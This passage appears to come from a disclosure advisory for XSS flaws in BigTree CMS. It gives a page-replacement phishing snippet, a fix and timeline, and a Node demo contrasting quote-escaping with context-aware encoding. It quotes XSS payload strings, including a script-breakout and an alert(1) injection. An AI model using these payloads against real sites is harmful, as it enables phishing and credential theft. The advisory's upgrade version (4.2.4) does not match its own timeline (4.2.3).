The attack can for example be used for phishing, by displaying the login page and sending the data submitted by the victim to an attacker-controlled server.

   var payload = document.createElement('div');
   payload.innerHTML = " ";
   document.replaceChild(payload, document.documentElement);

4. Solution

To mitigate this issue please upgrade at least to version 4.2.4:
http://ift.tt/1h1JZH1
Please note that a newer version might already be available.

5. Report Timeline

07/07/2015 Informed Vendor about Issue
07/08/2015 Vendor sent Fixes for confirmation
07/10/2015 Fixes Confirmed
07/26/2015 Vendor releases Version 4.2.3
08/07/2015 Disclosed to public
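The four findings above reflect the same kind of input into three different output contexts: an HTML attribute value (XSS 1, XSS 3), element text (XSS 3) and a JavaScript string literal inside a script block (XSS 4). The Node script below is an added example, not BigTree code and not part of the advisory: it shows why backslash-escaping quotes (the "quotes are escaped" limitation noted for XSS 2 and XSS 4) does nothing for an HTML attribute, and why a JavaScript literal needs more than quote escaping so that a "</script>" inside the value cannot end the block early. The two templates, the addslashes-style escaper, the check functions and the "</script>" payload are assumptions; the XSS 3 and XSS 4 payload strings are copied from the PoC URLs above.

```javascript
// Payloads taken from the advisory's PoC URLs; SCRIPT_BREAKOUT is constructed for the demo.
const XSS3_PAYLOAD = `'">`;
const XSS4_PAYLOAD = `xsstest", }});}});alert(1);$("#pages_pages").sortable({`;
const SCRIPT_BREAKOUT = `</script><script>alert(1)</script>`;

// addslashes()-style escaping (assumed): only prefixes quotes and backslashes with a
// backslash. Keeps a JavaScript string literal closed; meaningless in HTML, where a
// backslash is just another character.
function addslashes(s) {
  return s.replace(/[\\'"]/g, (c) => "\\" + c);
}

// Encoder for HTML text and attribute values. The template must also double-quote
// the attribute for this to be sufficient.
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

// Encoder for a value placed in a JavaScript string literal inside a <script> block.
// JSON.stringify escapes quotes, backslashes and control characters and adds the
// surrounding quotes; '<' and '>' are escaped on top so "</script>" cannot terminate
// the block, and U+2028/U+2029 so no engine sees a line terminator inside the literal.
function jsStringLiteral(s) {
  return JSON.stringify(s).replace(/[<>\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Assumed templates standing in for the attribute sink and the script sink.
function renderHiddenInput(value, encode) {
  return `<input type="hidden" name="id" value="${encode(value)}" />`;
}
function renderAjaxScript(literal) {
  return `<script>$.ajax("", { type: "POST", data: { id: ${literal} } });</script>`;
}

// Check 1: a raw double quote in the encoded attribute value terminates the attribute,
// and everything after it is parsed as markup.
function attributeBreaksOut(encodedValue) {
  return encodedValue.includes('"');
}

// Check 2: the script block must end exactly once, where the template ends it, and the
// literal must evaluate back to the original value.
function scriptIsIntact(original, literal) {
  const body = renderAjaxScript(literal);
  const endsOnce = body.indexOf("</script>") === body.lastIndexOf("</script>");
  let roundTrips = false;
  try {
    roundTrips = new Function("return " + literal)() === original;
  } catch (e) {
    roundTrips = false;
  }
  return endsOnce && roundTrips;
}

function demo() {
  return {
    addslashesAttr: attributeBreaksOut(addslashes(XSS3_PAYLOAD)),      // true: still exploitable
    escapeHtmlAttr: attributeBreaksOut(escapeHtml(XSS3_PAYLOAD)),      // false
    jsonOnlyScript: scriptIsIntact(SCRIPT_BREAKOUT, JSON.stringify(SCRIPT_BREAKOUT)), // false
    hardenedScript: scriptIsIntact(SCRIPT_BREAKOUT, jsStringLiteral(SCRIPT_BREAKOUT)), // true
    xss4Hardened: scriptIsIntact(XSS4_PAYLOAD, jsStringLiteral(XSS4_PAYLOAD)),         // true
  };
}

console.log(demo());
```

The PHP counterparts are htmlspecialchars() with ENT_QUOTES for the attribute and text sinks and json_encode() with JSON_HEX_TAG for the script sink; the point of the example is that each sink needs the encoder for its own context, and that escaping quotes alone is the wrong fix for both.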
